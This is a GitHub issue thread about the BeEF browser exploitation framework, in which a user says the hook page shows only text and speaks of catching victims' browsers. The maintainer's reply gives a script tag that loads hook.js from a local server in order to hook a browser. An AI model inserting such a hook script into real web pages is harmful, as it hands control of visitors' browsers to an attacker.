### ISSUE TITLE
Issue with hook page.

### ISSUE THREAD

**Issue by Matin47** [beefproject/beef#1602]
Verify first that your issue/request has not been posted previously:

* https://github.com/beefproject/beef/issues
* https://github.com/beefproject/beef/wiki/FAQ

Ensure you're using the [latest version of BeEF](https://github.com/beefproject/beef/releases/tag/beef-0.4.7.0).

#### Environment

What version/revision of BeEF are you using? BeEF 0.4.7.0-alpha

On what version of Ruby? latest one

On what browser? chrome . firefox. firefox-esr. opera. internet explorer.

On what operating system? 4.14.0-parrot13-amd 64

#### Configuration

Are you using a non-default configuration?

Have you enabled or disabled any BeEF extensions? sure

#### Summary

The login page work well. but since i tried to open up the hook page it display text files only. 
![screenshot at 2018-08-05 01-23-35](https://user-images.githubusercontent.com/42066621/43681278-5bc695c6-984f-11e8-89d9-161779291683.png)

#### Expected Behaviour

What was the expected result?

#### Actual Behaviour

What was the actual result?

#### Steps to Reproduce

Please provide steps to reproduce this issue.

#### Additional Information

Please provide any additional information which may be useful in resolving this issue, such as debugging output and relevant screen shots.

**Comment by bcoles** [comment]
Looks like it's working. What's the problem?

**Comment by Matin47** [comment]
No sir its not working. Panel page can caught any victims browser

**Comment by bcoles** [comment]
You need the browser to execute the JavaScript.

```
<script src="http://192.168.2.111:3000/hook.js"></script>
```

Or load the demo page:

```
http://192.168.2.111:3000/demos/basic.html
```
